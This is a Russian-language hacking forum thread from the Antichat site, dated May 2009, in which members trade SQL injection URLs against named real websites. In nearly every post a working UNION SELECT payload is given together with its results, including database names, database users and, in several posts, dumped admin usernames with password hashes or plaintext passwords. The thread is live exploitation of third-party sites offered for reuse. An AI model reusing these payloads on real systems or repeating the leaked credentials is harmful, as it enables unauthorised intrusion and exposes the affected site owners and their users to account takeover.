ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #9491  
Старый 23.05.2009, 19:10
udman
Постоянный
Регистрация: 21.04.2009
Сообщений: 321
Провел на форуме:
785842

Репутация: 239
По умолчанию

Цитата:
http://zona.zp.ua/boardname.php?c=-85+UNI ON+SELECT+0,concat_ws(0x0 b,user(),version(),database())
ivan_zona@localhost
5.0.77-community
ivan_zona

Логины пассы юзерей

Цитата:
http://zona.zp.ua/boardname.php?c=-85+UNION+SELECT+0,c oncat_ws(0x0b,password,u_email)+FROM+ivan_zona.use r s+--+
Цитата:
http://ok.salgir.info/ok_adv.php?gr=79&r=84+UNION+SELECT+1,CONCAT(user() ,0x0b,database(), 0x0b,ve rsion()),3,4+FROM+users+LIMIT+1,10--
u_client_salgir@localhost
salgir
4.1.22-log

Юзеры

Цитата:
http://ok.salgir.info/ok_adv.php?gr=79&r=84+UN ION+SELECT+1,CONCAT(user(),0x0b,database(),0x0b,ve rsion()),3,4+FROM+u sers+LIMIT+1,10--

Цитата:
http://alchevsk-city.com/board.php?board=8'+UNION+SELECT+0,1,2,concat_ws(0x 0b,version(),datab ase(),us er()),4+--+
4.1.22-standard
total_city
total_city@localhost


Цитата:
http://crimea.swingua.net/index.php?find_age=-2+UNION+SELECT+0,2,3,4,5,6,7,CONCAT_WS(0x0b,Ve rsion(),Database(),U ser()),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 ,24,25+--+&find_month=300&find_status=6&find_who=100&mod=se arch&sortby=D

4.1.22-standard
handy_crimea
handy_crimea@localhost

Последний раз редактировалось udman; 23.05.2009 в 21:48..
 
Ответить с цитированием

  #9492  
Старый 23.05.2009, 20:56
beerhack
Участник форума
Регистрация: 01.03.2008
Сообщений: 149
Провел на форуме:
3395070

Репутация: 173
По умолчанию

PR6
Код:
http://www.augustana.edu/academics/music/department/facultyBio.php?ID=-1+union+select+1,2,3,4,concat_ws(0x3a,user,password),6,7,8,9,10,11+from+mysql.user/*
Database Version: 4.1.22-log
Database name: music
User name: music@freya.augustana.edu

music:244ed17b5aa3b964
 
Ответить с цитированием

  #9493  
Старый 23.05.2009, 21:26
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
Отправить сообщение для DezMond™ с помощью ICQ
По умолчанию

http://www.reformjudaismboston.org/content.php?id=-108'+union+select+1,database(),3,4,5,6,7,8,9,10,11 ,12+--+
reformjudaismboston_org_-_invision2
 
Ответить с цитированием

  #9494  
Старый 23.05.2009, 21:29
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.netmedica.ro/stire.php?id=-63+UNION+SELECT+1,concat_ws(0x3a,version(),databas e(),useR(),@@version_compile_os),3,4--


Database Version: 5.0.54-log
Database name: netmedica
User name: netmedicasql@localhost
Os: pc-linux-gnu

http://www.netmedica.ro/stire.php?id=-63+UNION+SELECT+1,concat_Ws(0x3a,user_name,user_pa sswd),3,4+FROM+netmedica.users+LIMIT+x,1--

0]:testuser:a/Uw5jGt4sWxY
[1]:testadmin:e2d1903c479e40495a09ee7e40e42de8
[2]:admin:gzAV0iFKm9PbU
[3]:gabi:3Kbi7htfFdTew
[4]:dafi:.S9LiwYFcjV2c
[5]:adm:e2d1903c479e40495a09ee7e40e42de8
[6]:aqsw12:e2d1903c479e40495a09ee7e40e42de8
 
Ответить с цитированием

  #9495  
Старый 23.05.2009, 21:51
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
Отправить сообщение для DezMond™ с помощью ICQ
По умолчанию

pr6
http://www.semops.com/content.php?id=-296+union+select+1,2,3,4,5,6,7,database(),9,10+fro m+users+/*+
semops
Колонки не смог подобрать((

http://www.jimmcleantexas.com/content.php?id=-33+union+select+1,2,username,password,5,6,7,8,9+fr om+admin+/*+
admin::21232f297a57a5a743894a0e4a801fc3 - admin

Последний раз редактировалось DezMond™; 23.05.2009 в 22:01..
 
Ответить с цитированием

  #9496  
Старый 24.05.2009, 00:04
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802

Репутация: 298
По умолчанию

-------------------------------------------------

http://www.clubservices.com.mx/prov.php?id=116+union+select+1,2,3,4,5,6,7

5.0.45:sci@localhost:SCI

таблицы: http://www.clubservices.com.mx/prov.php?id=-116+union+select+table_name,2,3,4,5,6,7+from+infor mation_schema.tables

--------------------------------------------------------
http://www2.hnk.hr/hr/novosti.php?id=385+union+select+1,2,3,4,concat_ws( 0x3a,version(),user(),database())

5.0.32-Debian_7etch10-log:hnk@localhost:hnk

нас интересует:
http://www2.hnk.hr/hr/novosti.php?id=385+union+select+1,2,3,4,table_name +from+information_schema.tables+limit+34,1/*

поля:
user_id
type
first_name
last_name
email
login
password

Число записей: http://www2.hnk.hr/hr/novosti.php?id=385+union+select+1,2,3,4,count(*)+f rom+users/*
одна запись

http://www2.hnk.hr/hr/novosti.php?id=385+union+select+1,2,3,4,concat_ws( 0x3a,login,password)+from+users/*
zlatko:monografija

-------------------------------------

да простит меня Бог. следующий сайт
http://www.tyri.orthodox.ee/novosti.php?id=51+union+select+1,2,3,4,5,6,7,8

http://www.tyri.orthodox.ee/novosti.php?id=51+union+select+1,2,concat_ws(0x3a, version(),user(),database()),4,5,6,7,8
4.1.20rthodox@localhostrthodox

-------------------------------------
 
Ответить с цитированием

  #9497  
Старый 24.05.2009, 01:09
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
Отправить сообщение для DezMond™ с помощью ICQ
По умолчанию

http://www.auchinachie.com/content.php?id=-8+union+select+1,2,id,4,password,6,7,8,9,10,11,12, 13,14,15+from+users+/*+
0000000247::bluepix05
 
Ответить с цитированием

  #9498  
Старый 24.05.2009, 03:28
DeepXhadow
Познающий
Регистрация: 19.04.2008
Сообщений: 67
Провел на форуме:
596695

Репутация: 19
По умолчанию

http://ej.kubagro.ru/a/viewaut.asp?id=11+UNION+SELECT+1,2,3,4,5,6,7,8,9,1 0,11,12,13+from+news

Microsoft JET Database Engine
 
Ответить с цитированием

  #9499  
Старый 24.05.2009, 03:37
Kimliksiz
Познающий
Регистрация: 07.05.2009
Сообщений: 31
Провел на форуме:
137000

Репутация: 96
По умолчанию



http://www.fig.gr/index.php?option=com_recipes&Itemid=S@BUN&func=det ail&id=-1/**/union/**/select/**/0,1,concat(username,0x3a,password),username,0x3a,5 ,6,7,8,9,10,11,12,0x3a,0x3a,0x3a,username,username ,0x3a,0x3a,0x3a,21,0x3a/**/from/**/mos_users/*

admin:b86104f63387af1ccb1d049223680a2c
 
Ответить с цитированием

  #9500  
Старый 24.05.2009, 13:13
Skofield
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
Провел на форуме:
1759582

Репутация: 394
По умолчанию

http://www.amherst250.org {PR 4}
Код:
http://www.amherst250.org/index.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9,10,11/*
4.1.20 : amherst250bs : fclerk@localhost

------------------------------------------------------------------------------------------------

http://www.newcastlemusic.com {PR 4}
Код:
http://www.newcastlemusic.com/artists.php?ID=-2340+union+select+1,concat_ws(0x3a,version(),database(),user())/*
4.1.22-log : agoodwi_newcastlemusic : agoodwi_nmsite@bsd8.qnetau.com

Последний раз редактировалось Skofield; 24.05.2009 в 13:50..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT.XYZ